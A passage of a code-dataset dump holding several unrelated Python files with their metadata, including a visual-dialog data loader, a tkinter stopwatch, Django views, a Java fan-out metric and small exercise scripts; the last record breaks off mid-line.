{}\n\t\tfor dataset in ['train','val','test']:\n\t\t\tif normalize:\n\t\t\t\tself.images[dataset] = np.array(self.imageAll['images_'+dataset]) / (np.sqrt(np.sum(np.square(self.imageAll['images_'+dataset]), 1)))[:,None]\n\t\t\telse:\n\t\t\t\tself.images[dataset] = np.array(self.imageAll['images_'+dataset])\n\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.image_pos[dataset] = np.array(self.dialog['img_pos_'+dataset])\n\n\tdef processHistory(self, maxHistoryLen=60):\n\t\tself.history = {}\n\t\tself.history_length = {}\n\n\t\tfor dataset in ['train', 'val', 'test']:\n\t\t\tself.history[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.questionLength+self.answerLength), dtype=np.int64)\n\t\t\tself.history_length[dataset] = np.zeros((self.datasize[dataset], self.dialogLength), dtype=np.int64)\n\n\t\t\tfor example in 
range(self.datasize[dataset]):\n\t\t\t\t#First round has caption as history\n\t\t\t\tcaptionLength = min(self.captions_length[dataset][example], self.questionLength+self.answerLength)\n\t\t\t\tself.history[dataset][example, 0, :captionLength] = self.captions[dataset][example, :captionLength]\n\t\t\t\tself.history_length[dataset][example, 0] = captionLength\n\n\t\t\t\t#Other Rounds have previous Q + A\n\t\t\t\tfor turn in range(self.dialogLength-1):\n\t\t\t\t\tlenQ = self.questions_length[dataset][example, turn]\n\t\t\t\t\tlenA = self.answers_length[dataset][example, turn]\n\t\t\t\t\tself.history[dataset][example, turn + 1, :lenQ] = self.questions[dataset][example, turn, :lenQ]\n\t\t\t\t\tself.history[dataset][example, turn + 1, lenQ:lenQ+lenA] = self.answers[dataset][example, turn, :lenA]\n\t\t\t\t\tself.history_length[dataset][example, turn + 1] = lenQ + lenA\n\n\tdef processQHistory(self, maxHistoryLen=60):\n\t\tself.Qhistory = {}\n\t\tself.Qhistory_length = {}\n\n\t\tfor dataset in ['train', 'val', 'test']:\n\t\t\tself.Qhistory[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.questionLength+self.answerLength), dtype=np.int64)\n\t\t\tself.Qhistory_length[dataset] = np.zeros((self.datasize[dataset], self.dialogLength), dtype=np.int64)\n\n\t\t\tfor example in range(self.datasize[dataset]):\n\t\t\t\t#First round has caption as history\n\t\t\t\tcaptionLength = min(self.captions_length[dataset][example], self.questionLength+self.answerLength)\n\t\t\t\tself.Qhistory[dataset][example, 0, :captionLength] = self.captions[dataset][example, :captionLength]\n\t\t\t\tself.Qhistory_length[dataset][example, 0] = captionLength\n\n\t\t\t\tlenQ = self.questions_length[dataset][example, 0]\n\t\t\t\t# lenA = self.answers_length[dataset][example, 0]\n\t\t\t\tself.Qhistory[dataset][example, 1, :lenQ] = self.questions[dataset][example, 0, :lenQ]\n\t\t\t\t# self.history[dataset][example, 1, lenQ:lenQ+lenA] = self.answers[dataset][example, turn, :lenA]\n\t\t\t\tself.Qhistory_length[dataset][example, 1] = lenQ\n\t\t\t\t#Other Rounds have previous Q + A\n\t\t\t\tfor turn in range(1,self.dialogLength-1):\n\t\t\t\t\tlenQ = self.questions_length[dataset][example, turn]\n\t\t\t\t\tlenA = self.answers_length[dataset][example, turn - 1]\n\t\t\t\t\tself.Qhistory[dataset][example, turn + 1, :lenQ] = self.questions[dataset][example, turn, :lenQ]\n\t\t\t\t\tself.Qhistory[dataset][example, turn + 1, lenQ:lenQ+lenA] = self.answers[dataset][example, turn - 1, :lenA]\n\t\t\t\t\tself.Qhistory_length[dataset][example, turn + 1] = lenQ + lenA\n\n\n\tdef processAnswers(self):\n\t\tself.answers_input = {}\n\t\tself.answers_output = {}\n\t\tself.appended_answers_length = {}\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.answers_input[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.answerLength + 1), dtype=np.int64)\n\t\t\tself.answers_output[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.answerLength + 1), dtype=np.int64)\n\n\t\t\tfor example in range(self.datasize[dataset]):\n\t\t\t\tfor turn in range(self.dialogLength):\n\t\t\t\t\tanswerLength = self.answers_length[dataset][example, turn]\n\t\t\t\t\tself.answers_input[dataset][example,turn,0] = self.START_INDEX\n\t\t\t\t\tself.answers_input[dataset][example,turn,1:answerLength+1] = self.answers[dataset][example,turn,:answerLength]\n\n\t\t\t\t\tself.answers_output[dataset][example, turn, :answerLength] = self.answers[dataset][example,turn,:answerLength]\n\t\t\t\t\tself.answers_output[dataset][example, turn, 
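                    # note: answers_output is the decoder target, i.e. the answer
                    # tokens followed by END_INDEX, pairing with the START_INDEX-
                    # prefixed answers_input built just above (teacher forcing)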
answerLength] = self.END_INDEX\n\n\t\t\tself.appended_answers_length[dataset] = self.answers_length[dataset] + 1\n\n\tdef processQuestions(self):\n\t\tself.questions_input = {}\n\t\tself.questions_output = {}\n\t\tself.appended_questions_length = {}\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.questions_input[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.questionLength + 1), dtype=np.int64)\n\t\t\tself.questions_output[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.questionLength + 1), dtype=np.int64)\n\n\t\t\tfor example in range(self.datasize[dataset]):\n\t\t\t\tfor turn in range(self.dialogLength):\n\t\t\t\t\tquestionLength = self.questions_length[dataset][example, turn]\n\t\t\t\t\tself.questions_input[dataset][example,turn,0] = self.START_INDEX\n\t\t\t\t\tself.questions_input[dataset][example,turn,1:questionLength+1] = self.questions[dataset][example,turn,:questionLength]\n\n\t\t\t\t\tself.questions_output[dataset][example, turn, :questionLength] = self.questions[dataset][example,turn,:questionLength]\n\t\t\t\t\tself.questions_output[dataset][example, turn, questionLength] = self.END_INDEX\n\n\t\t\tself.appended_questions_length[dataset] = self.questions_length[dataset] + 1\n\n\tdef processOptions(self):\n\t\tself.options_input = {}\n\t\tself.options_output = {}\n\t\tself.appended_options_length = {}\n\t\tfor dataset in ['val','test']:\n\t\t\tself.options_input[dataset] = np.zeros((self.options_list[dataset].shape[0], self.answers[dataset].shape[2] + 1), dtype=np.int64)\n\t\t\tself.options_output[dataset] = np.zeros((self.options_list[dataset].shape[0], self.answers[dataset].shape[2] + 1), dtype=np.int64)\n\n\t\t\tfor example in range(self.options_list[dataset].shape[0]):\n\t\t\t\toptionLength = self.options_length[dataset][example]\n\t\t\t\tself.options_input[dataset][example, 0] = self.START_INDEX\n\t\t\t\tself.options_input[dataset][example, 1:optionLength+1] = self.options_list[dataset][example, :optionLength]\n\n\t\t\t\tself.options_output[dataset][example, :optionLength] = self.options_list[dataset][example, :optionLength]\n\t\t\t\tself.options_output[dataset][example, optionLength] = self.END_INDEX\n\n\t\t\tself.appended_options_length[dataset] = self.options_length[dataset] + 1\n\n\n\tdef processData(self, normalize=True):\n\t\tself.isRightAligned = False\n\t\tself.processParams()\n\t\tself.processQA()\n\t\tself.processImage(normalize)\n\t\tself.datasize = {}\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.datasize[dataset] = self.questions[dataset].shape[0]\n\t\tself.dialogLength = self.questions['train'].shape[1]\n\t\tself.questionLength = self.questions['train'].shape[2]\n\t\tself.answerLength = self.answers['train'].shape[2]\n\t\tself.processAnswers()\n\t\tself.processQuestions()\n\t\tself.processHistory()\n\t\tself.processQHistory()\n\t\tself.processOptions()\n\t\t# self.rightAlignAll()\n\n\tdef getBatch(self, indexes, dataset):\n\t\tbatch = {}\n\t\tbatch['questions_length'] = self.questions_length[dataset][indexes,:]\n\t\tbatch_max_ques_length = np.max(batch['questions_length'])\n\t\tif self.isRightAligned:\n\t\t\tbatch['questions'] = self.questions[dataset][indexes,:,self.questions[dataset].shape[2] - batch_max_ques_length:]\n\t\telse:\n\t\t\tbatch['questions'] = self.questions[dataset][indexes,:,:batch_max_ques_length]\n\n\t\tbatch['history_length'] = self.history_length[dataset][indexes,:]\n\t\tbatch_max_history_length = np.max(batch['history_length'])\n\t\tif self.isRightAligned:\n\t\t\tbatch['history'] = 
self.history[dataset][indexes,:,self.history[dataset].shape[2] - batch_max_history_length:]\n\t\telse:\n\t\t\tbatch['history'] = self.history[dataset][indexes,:,:batch_max_history_length]\n\n\t\tbatch['images'] = self.images[dataset][self.image_pos[dataset][indexes],:]\n\n\t\tbatch['answers_length'] = self.appended_answers_length[dataset][indexes,:]\n\t\tbatch_max_answer_length = np.max(batch['answers_length'])\n\t\tbatch['answers_input'] = self.answers_input[dataset][indexes,:,:batch_max_answer_length]\n\t\tbatch['answers_output'] = self.answers_output[dataset][indexes,:,:batch_max_answer_length]\n\t\tbatch['answers_indexes'] = self.answers_indexes[dataset][indexes,:]\n\n\t\tif dataset == 'test' or dataset == 'val':\n\t\t\tbatch['options_indexes_array'] = self.options[dataset][indexes,:,:]\n\t\t\tbatch['options_indexes'] = np.reshape(batch['options_indexes_array'], (-1,))\n\t\t\tbatch['options_length'] = self.appended_options_length[dataset][batch['options_indexes']]\n\t\t\tbatch_max_option_length = np.max(batch['options_length'])\n\t\t\tbatch['options_input'] = self.options_input[dataset][batch['options_indexes'],:batch_max_option_length]\n\t\t\tbatch['options_output'] = self.options_output[dataset][batch['options_indexes'],:batch_max_option_length]\n\t\t\tbatch['options_length'] = np.reshape(batch['options_length'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2]))\n\t\t\tbatch['options_input'] = np.reshape(batch['options_input'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2], -1))\n\t\t\tbatch['options_output'] = np.reshape(batch['options_output'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2], -1))\n\t\treturn batch\n\n\tdef getQBatch(self, indexes, dataset):\n\t\tbatch = {}\n\t\tbatch['answers_length'] = np.zeros(shape=(len(indexes), self.dialogLength + 1), dtype=np.int64)\n\t\tbatch['answers_length'][:,1:] = self.answers_length[dataset][indexes,:]\n\t\tbatch['answers_length'][:,0] = 1\n\t\tbatch_max_answer_length = np.max(batch['answers_length'])\n\t\tbatch['answers'] = np.zeros(shape=(len(indexes), self.dialogLength + 1, batch_max_answer_length), dtype=np.int64)\n\t\tif self.isRightAligned:\n\t\t\tbatch['answers'][:,1:,:] = self.answers[dataset][indexes,:,self.answers[dataset].shape[2] - batch_max_answer_length:]\n\t\telse:\n\t\t\tbatch['answers'][:,1:,:] = self.answers[dataset][indexes,:,:batch_max_answer_length]\n\t\tbatch['history_length'] = self.Qhistory_length[dataset][indexes,:]\n\t\tbatch_max_history_length = np.max(batch['history_length'])\n\t\tif self.isRightAligned:\n\t\t\tbatch['history'] = self.Qhistory[dataset][indexes,:,self.history[dataset].shape[2] - batch_max_history_length:]\n\t\telse:\n\t\t\tbatch['history'] = self.Qhistory[dataset][indexes,:,:batch_max_history_length]\n\n\t\tbatch['images'] = self.images[dataset][self.image_pos[dataset][indexes],:]\n\n\t\tbatch['questions_length'] = self.appended_questions_length[dataset][indexes,:]\n\t\tbatch_max_ques_length = np.max(batch['questions_length'])\n\t\tbatch['questions_input'] = self.questions_input[dataset][indexes,:,:batch_max_ques_length]\n\t\tbatch['questions_output'] = self.questions_output[dataset][indexes,:,:batch_max_ques_length]\n\t\t# batch['answers_indexes'] = self.answers_indexes[dataset][indexes,:]\n\t\t#\n\t\t# if dataset == 'test' or dataset == 'val':\n\t\t# 
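		# note: unlike getBatch above, the candidate-option tensors stay commented
		# out here, so Q-bot batches are built without answer-option ranking.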
\tbatch['options_indexes_array'] = self.options[dataset][indexes,:,:]\n\t\t# \tbatch['options_indexes'] = np.reshape(batch['options_indexes_array'], (-1,))\n\t\t# \tbatch['options_length'] = self.appended_options_length[dataset][batch['options_indexes']]\n\t\t# \tbatch_max_option_length = np.max(batch['options_length'])\n\t\t# \tbatch['options_input'] = self.options_input[dataset][batch['options_indexes'],:batch_max_option_length]\n\t\t# \tbatch['options_output'] = self.options_output[dataset][batch['options_indexes'],:batch_max_option_length]\n\t\t# \tbatch['options_length'] = np.reshape(batch['options_length'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2]))\n\t\t# \tbatch['options_input'] = np.reshape(batch['options_input'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2], -1))\n\t\t# \tbatch['options_output'] = np.reshape(batch['options_output'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2], -1))\n\t\treturn batch\n\n\tdef rightAlignAll(self):\n\t\tself.isRightAligned = True\n\t\tfor dataset in ['train', 'test', 'val']:\n\t\t\tself.questions[dataset] = self.rightAlign(self.questions[dataset], self.questions_length[dataset])\n\t\t\tself.history[dataset] = self.rightAlign(self.history[dataset], self.history_length[dataset])\n\n\tdef rightAlign(self, sequences, length):\n\t\trightAlign = np.zeros_like(sequences)\n\t\tdims = len(sequences.shape)\n\t\tif dims == 3:\n\t\t\tfor example in range(sequences.shape[0]):\n\t\t\t\tfor turn in range(sequences.shape[1]):\n\t\t\t\t\trightAlign[example,turn, sequences.shape[2] - length[example, turn]:] = sequences[example, turn, :length[example, turn]]\n\t\treturn rightAlign\n\n# dialog_loc = '../chat_processed_data.h5'\n# param_loc = '../chat_processed_params.json'\n# image_loc = '../data_img.h5'\n\n# a = DataLoader(dialog_loc, image_loc, param_loc)\n# a.getTrainBatch(np.random.randint(100, size=30))\n","sub_path":"QBot/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":16937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"506361687","text":"from tkinter import *\nfrom time import sleep\nimport pickle,os\nglobal sec\nsec = 0\nfile2 = open('sec.dat','wb')\npickle.dump(sec,file2)\nfile2.close()\nglobal end\nend = False\nwindow = Tk()\nwindow.configure(bg = 'green')\nc = Canvas(window,width= 200,height = 200, bg = 'green')\nc.pack()\ndata= True\nfile = open('pickle.dat', 'wb')\npickle.dump(data,file)\nfile.close()\npause = False\nfile = open('pause.dat', 'wb')\npickle.dump(pause,file)\nfile.close()\nsec = 0\n\nwindow2 = Tk()\nwindow2.title('Entry')\nwindow2.configure(bg = 'yellow')\nframe = Frame(window2)\nentry = Entry(frame)\ndef entryadd():\n window.title(entry.get())\nbtn2 = Button(window2, text = 'Enter',command = entryadd, bg = 'lightblue')\nbtn2.pack(side = RIGHT,padx = 5)\nframe.pack(padx = 20, pady = 20)\nentry.pack(side = LEFT)\n\ndef pause():\n btnpause.configure(state=DISABLED)\n btnunpause.configure(state=NORMAL)\n pause = True\n file3=open('pause.dat','wb')\n pickle.dump(pause,file3)\n file3.close()\ndef stop():\n data = False\n file = open('pickle.dat', 'wb')\n pickle.dump(data,file)\n file.close()\ndef unpause():\n btnpause.configure(state=NORMAL)\n btnunpause.configure(state=DISABLED)\n pause = False\n 
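    # comments added for clarity: the pause flag travels to the running start()
    # loop through 'pause.dat' instead of a Python global; start() re-reads the
    # file on every one-second tick and saves 'sec' before breaking out.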
file3=open('pause.dat','wb')\n pickle.dump(pause,file3)\n file3.close()\n poo = 1\n start(poo)\ndef start(event):\n btn.configure(state = NORMAL)\n btnpause.configure(state = NORMAL) \n WIDTH = 200\n HEIGHT = 200\n file2 = open('sec.dat','rb')\n sec = pickle.load(file2)\n file2.close()\n sec = int(sec)\n while True:\n sleep(1)\n sec += 1\n min1 = sec * 60\n print (min1)\n time_text = c.create_rectangle(WIDTH,HEIGHT,-WIDTH,-HEIGHT,fill = 'green')\n time_text = c.create_text(WIDTH/2,HEIGHT/2,text = str(sec),fill = 'white',font = ('Droid Serif',16))\n window.update()\n file = open('pickle.dat','rb')\n data = pickle.load(file)\n file.close()\n file3=open('pause.dat','rb')\n pause = pickle.load(file3)\n file3.close\n if pause == True:\n file2 = open('sec.dat','wb')\n pickle.dump(sec,file2)\n file2.close()\n break\n elif data == False:\n file2 = open('sec.dat','wb')\n pickle.dump(sec,file2)\n file2.close()\n break\n else:\n continue\nc.bind_all('', start)\nbtn = Button(window, text = 'stop', command = stop, bg = 'lightblue')\nbtnpause = Button(window,text = 'pause',command = pause,bg = 'lightblue')\nbtnunpause = Button(window,text = 'unpause',command = unpause, bg = 'lightblue')\nbtnpause.pack()\nbtn.pack()\nbtnunpause.pack()\nbtnunpause.configure(state = DISABLED)\nbtn.configure(state = DISABLED)\nbtnpause.configure(state = DISABLED)\n","sub_path":"The-finished-stopwatch.py","file_name":"The-finished-stopwatch.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"356414967","text":"# -*-coding: utf-8 -*-\ndef stu_register(name, age, course='PY' ,country='CN'):\n stu_info = \"\"\"--------注册学生信息--------\n name: %s \n age: %s \n country: %s \n course: %s \n----------------------------\n\"\"\" % (name, age, country, course)\n print(stu_info)\n if age > 50:\n return False\n else:\n return True\n\nregistriation_status = stu_register(\"henry\",60,course=\"Python\",country='USA')\n\nif registriation_status:\n print(\"注册成功\")\nelse:\n print(\"too old to be a student.\")","sub_path":"samples/函数返回值.py","file_name":"函数返回值.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"618758671","text":"from django.contrib import messages\nfrom django.urls import reverse\nfrom django.utils.encoding import force_text\nfrom django.utils.html import format_html\nfrom django.utils.http import urlquote\nfrom django.utils.translation import ugettext_lazy as _\nfrom material.frontend.views.create import CreateModelView as MaterialCreateModelView\n\n\nclass CreateModelView(MaterialCreateModelView):\n label = None\n name = None\n\n def __init__(self, *args, **kwargs):\n self.label = kwargs.get(\"label\")\n self.name = kwargs.get(\"name\")\n self.extra_context = kwargs.get(\"extra_context\")\n\n super().__init__(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n kwargs = {\n \"list_url\": f\"{self.label}:{self.name}_list\",\n \"detail_url\": f\"{self.label}:{self.name}_detail\",\n }\n\n kwargs.setdefault(\"view\", self)\n\n if \"form\" not in kwargs:\n kwargs[\"form\"] = self.get_form()\n\n if self.extra_context is not None:\n if callable(self.extra_context):\n kwargs.update(self.extra_context(self.request))\n else:\n kwargs.update(self.extra_context)\n\n return kwargs\n\n def get_success_url(self):\n if self.success_url is None:\n args = []\n\n extra_context = None\n\n if callable(self.extra_context):\n extra_context = 
self.extra_context(self.request)\n else:\n extra_context = self.extra_context\n\n if extra_context is not None:\n item_args = extra_context.get(\"item_args\", [])\n args += item_args\n\n args += [self.object.pk]\n\n return reverse(f\"{self.label}:{self.name}_detail\", args=args)\n\n return self.success_url\n\n def get_template_names(self):\n if self.template_name is None:\n return [\n f\"{self.label}/{self.name}{self.template_name_suffix}.html\",\n f\"{self.label}/{self.name}_form.html\",\n \"material/frontend/views/form.html\",\n ]\n\n return [self.template_name]\n\n def report(self, message, level=messages.INFO, fail_silently=True, **kwargs):\n args = []\n\n extra_context = None\n\n if callable(self.extra_context):\n extra_context = self.extra_context(self.request)\n else:\n extra_context = self.extra_context\n\n if extra_context is not None:\n item_args = extra_context.get(\"item_args\", [])\n args += item_args\n\n args += [self.object.pk]\n\n url = reverse(f\"{self.label}:{self.name}_detail\", args=args)\n\n link = format_html('{}', urlquote(url), force_text(self.object))\n\n name = force_text(self.model._meta.verbose_name)\n\n options = {\"link\": link, \"name\": name}\n options.update(kwargs)\n\n message = format_html(_(message).format(**options))\n messages.add_message(self.request, level, message, fail_silently=True)\n","sub_path":"hcap_utils/contrib/material/views/create_model_view.py","file_name":"create_model_view.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"598259297","text":"from aibolit.utils.ast_builder import build_ast\nfrom aibolit.ast_framework import AST, ASTNodeType\nfrom itertools import islice\nfrom aibolit.ast_framework.java_package import JavaPackage\n\n\nclass FanOut:\n '''\n Fan Out metric is defined as the number of other classes referenced by a class.\n '''\n def __init__(self):\n pass\n\n def value(self, filename: str) -> int: # noqa: C901\n\n # exception are used from https://checkstyle.sourceforge.io/config_metrics.html#ClassFanOutComplexity\n considered_classes = {'ArrayIndexOutOfBoundsException': 0, 'ArrayList': 0, 'Boolean': 0, 'Byte': 0,\n 'Character': 0, 'Class': 0, 'Deprecated': 0, 'Deque': 0, 'Double': 0,\n 'Exception': 0, 'Float': 0, 'FunctionalInterface': 0, 'HashMap': 0,\n 'HashSet': 0, 'IllegalArgumentException': 0, 'IllegalStateException': 0,\n 'IndexOutOfBoundsException': 0, 'Integer': 0, 'LinkedList': 0, 'List': 0,\n 'Long': 0, 'Map': 0, 'NullPointerException': 0, 'Object': 0, 'Override': 0,\n 'Queue': 0, 'RuntimeException': 0, 'SafeVarargs': 0, 'SecurityException': 0,\n 'Set': 0, 'Short': 0, 'SortedMap': 0, 'SortedSet': 0, 'String': 0, 'StringBuffer': 0,\n 'StringBuilder': 0, 'SuppressWarnings': 0, 'Throwable': 0, 'short': 0, 'void': 0,\n 'TreeMap': 0, 'TreeSet': 0, 'UnsupportedOperationException': 0, 'Void': 0,\n 'System.out': 0, 'boolean': 0, 'byte': 0, 'char': 0, 'double': 0, 'float': 0,\n 'int': 0, 'long': 0,\n }\n fan_outs = 0\n\n # check imported classes\n tree = AST.build_from_javalang(build_ast(filename))\n for each_import in (tree.children_with_type(tree.root, ASTNodeType.IMPORT)):\n name_node, = islice(tree.children_with_type(each_import, ASTNodeType.STRING), 1)\n new_class = tree.get_attr(name_node, 'string').split('.')[-1]\n if considered_classes.get(new_class) is None:\n fan_outs += 1\n considered_classes[new_class] = 0\n\n p = JavaPackage(filename)\n for class_name in p.java_classes:\n tree = p.java_classes[class_name]\n for 
var_node in tree.get_nodes(ASTNodeType.VARIABLE_DECLARATOR):\n                var_child = list(tree.children_with_type(var_node, ASTNodeType.STRING))\n                new_class_name = tree.get_attr(var_child[0], 'string')\n\n                for class_creator_node in tree.children_with_type(var_node, ASTNodeType.CLASS_CREATOR):\n                    for go_to_name in tree.children_with_type(class_creator_node, ASTNodeType.REFERENCE_TYPE):\n                        classC_child = list(tree.children_with_type(go_to_name, ASTNodeType.STRING))\n                        used_class_name = tree.get_attr(classC_child[0], 'string')\n                        if considered_classes.get(used_class_name) is None:\n                            considered_classes[used_class_name] = 0\n                            fan_outs += 1\n                if considered_classes.get(new_class_name) is None:\n                    considered_classes[new_class_name] = 0\n\n        # check classes of invoked methods\n        for i in tree.get_nodes(ASTNodeType.STATEMENT_EXPRESSION):\n            for invoked_method_child in tree.children_with_type(i, ASTNodeType.METHOD_INVOCATION):\n                name_of_invoked_class = tree.get_method_invocation_params(invoked_method_child)\n                if considered_classes.get(name_of_invoked_class.object_name) is None:\n                    considered_classes[name_of_invoked_class.object_name] = 0\n                    fan_outs += 1\n\n        return fan_outs\n","sub_path":"aibolit/metrics/fanout/FanOut.py","file_name":"FanOut.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"457024328","text":"# Binary search\n# 2021-05-08\n# Immigration inspection\n# https://programmers.co.kr/learn/courses/30/lessons/43238\n\nfrom icecream import ic\n\ndef solution(n, times):\n    mx = max(times)*n\n    mn = 1\n    \n    while mn <= mx:\n        md = (mx+mn)//2\n        result = 0\n        for time in times:\n            result += md//time\n        if result >= n:\n            res = md\n            mx = md-1\n        elif result < n:\n            mn = md+1\n    \n    return res\n","sub_path":"problem solving/programmers/binary_search1.py","file_name":"binary_search1.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"265842012","text":"from example.Building_a_Mutiple_Choice_Quiz_26.Question import Question\n\n\nclass Student:\n\n    def __init__(self, name, major, gpa, is_on_probation):\n        self.name = name\n        self.major = major\n        self.gpa = gpa\n        self.is_on_probation = is_on_probation\n\n    def do_quiz(self, quiz):\n\n        score = 0\n        if len(quiz) < 1: # If there are no questions, return 0 points\n            return score\n\n        for question in quiz:\n            ans = input(question.prompt)\n            if ans == question.answer:\n                score += 1\n\n        return score / len(quiz) * 100\n","sub_path":"example/ClassesAndObjects_27/Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"397481667","text":"import sys\nd={}\ndef max_sum(i,j):\n    if (i,j) in d:\n        return d[(i,j)]\n    if i==99:\n        return a[i][j]\n    d[(i,j)]=a[i][j]+max(max_sum(i+1,j),max_sum(i+1,j+1))\n    return d[(i,j)]\na=[]\nfor i in range(100):\n    b=list(map(int,sys.stdin.readline().split()))\n    a.append(b)\nprint(max_sum(0,0))","sub_path":"triangleSumE67Py.py","file_name":"triangleSumE67Py.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"404784196","text":"from numpy.lib.utils import deprecate\nimport torch\nimport torch.nn as nn\nimport math\nimport numpy as np\n\nSCALINGS = ['he', 'mean', 'none']\n\n\nclass BinaryWeightMemory(object):\n    r\"\"\"\n    The goal of this class is to hold the original weights of the NN\n    while we make use of their binarized 
version in a fault memory setting\n :param p: the proportion of bits that will not get randomly switched (p(x_ = x) = p)\n \"\"\"\n\n def __init__(self,\n model: nn.Module,\n p: float = 0,\n scaling: str = 'he',\n shortcutavoid: bool = False,\n skipfirst: bool = False):\n r\"\"\"\n Hold the pointer to the weights and the quantized representation associated\n From Courbariaux & al. 2015\n \"\"\"\n ###\n # Input checks\n ###\n assert scaling in SCALINGS\n assert p > 0 and p <= 1, \"P={} is not a probability (0= self.pis[i], torch.tensor(\n [1.]).to(quantized.device), torch.tensor([-1.]).to(quantized.device))\n self.mask_faulty[i] = mask_faulty\n quantized *= mask_faulty\n if self.pis[i] == 0:\n assert torch.equal(quantized, true_value.sign())\n else:\n self.observed_fault_rate[i] = 1- (torch.sum((mask_faulty + 1)/2)/torch.numel(mask_faulty)).item()\n\n if self.scaling == 'he':\n quantized *= math.sqrt(2./(np.prod(true_value.shape)))\n # quantized *= math.sqrt(\n # 2. / (true_value.shape[1] * true_value.shape[2] * true_value.shape[3]))\n elif self.scaling == 'mean':\n quantized *= torch.mean(torch.abs(true_value))\n\n self.actual_params[i].data.copy_(quantized)\n\n def restore(self):\n for i in range(self.params):\n self.actual_params[i].data.copy_(self.saved_params[i])\n\n def clip(self):\n \"\"\" From Courbariaux & al. 2015, 2.4 - Clip weights after update to -1;1 \n since it doesn't impact the sign() ops while preventing overly large weights\n \"\"\"\n for i in range(self.params):\n self.actual_params[i].data.copy_(torch.clamp(\n self.actual_params[i], min=-1, max=1).data)\n\n def __str__(self):\n \"\"\" Return a string representing the first param of the weight manager \"\"\"\n return \"Saved params \\n {} \\n Actual params \\n {}\".format(self.saved_params[0], self.actual_params[0])\n\n @deprecate\n def change_p(self, new_p: float):\n \"\"\" Allowed to change the global probability of bit switch\n _differentiate_ is now the method to change the dictionnary of probabilites per (bloc, layer) tuple\n \"\"\"\n assert new_p >= 0 and new_p <= 1, \"P={} is not a probability (0= 18.5 < 24.9):\n print(\"You are Normal Weight\")\nelif (BMI2 > 25.0 <= 29.9):\n print(\"You are Over Weight\")\nelif (BMI2 > 30.0):\n print(\"You are Obese\")\n\n","sub_path":"h3q1MD.py","file_name":"h3q1MD.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"374205967","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .models import Prediction\nfrom .serializers import PredictionSerializers\nimport joblib\nimport pandas as pd\nfrom .form import PredictForm\nfrom django.contrib import messages\nfrom django.db.models import Sum\n\n\n# Create your views here.\n\nclass PredictionView(viewsets.ModelViewSet):\n queryset = Prediction.objects.all()\n serializer_class = PredictionSerializers\n\n\ndef text_value(df):\n ohe_col = joblib.load(\"/Users/tasrifahmed/PyProjects/final_project//allcollumn.pkl\")\n print(ohe_col)\n cat_columns = ['category']\n df_processed = pd.get_dummies(df, columns=cat_columns)\n print(df_processed)\n # df_list = df_processed.columns.to_numpy()\n newdict = {}\n for i in ohe_col:\n if i in df_processed:\n newdict[i] = df_processed[i].values\n else:\n newdict[i] = 0\n newdf = pd.DataFrame(newdict)\n return newdf\n\n\n# @api_view([\"POST\"])\ndef predict_svm(unit):\n try:\n mdl = 
joblib.load(\"/Users/tasrifahmed/PyProjects/final_project/product_model.pkl\")\n y_pred = mdl.predict(unit)\n print(y_pred)\n newdf = pd.DataFrame(y_pred, columns=['class'])\n newdf = newdf.replace({1: 'Low', 2: 'Medium', 3: 'High'})\n return format(newdf.values)\n except ValueError as e:\n return Response(e.args[0], status.HTTP_400_BAD_REQUEST)\n\n\ndef view_prediction(request):\n if request.method == 'POST':\n form = PredictForm(request.POST)\n if form.is_valid():\n Category = form.cleaned_data['category']\n Product = form.cleaned_data['product']\n Gross_sale = form.cleaned_data['gross_sale']\n Qty = form.cleaned_data['qty']\n Month = form.cleaned_data['month']\n myDictionary = request.POST.dict()\n print(myDictionary)\n DataFM = pd.DataFrame(myDictionary, index=[0])\n answer = text_value(DataFM)\n final_answer = predict_svm(answer)\n messages.success(request, 'Prediction for the Next Month Inventory is : {}'.format(final_answer))\n form.save(commit=True)\n\n form = PredictForm()\n\n return render(request, 'form.html', {'form': form})\n\n\ndef sold_product(request, *args, **kwargs):\n sold_items = Prediction.objects.all()\n qty_only = list(Prediction.objects.aggregate(sum_qty=Sum('qty')).values())[0]\n total_sale = 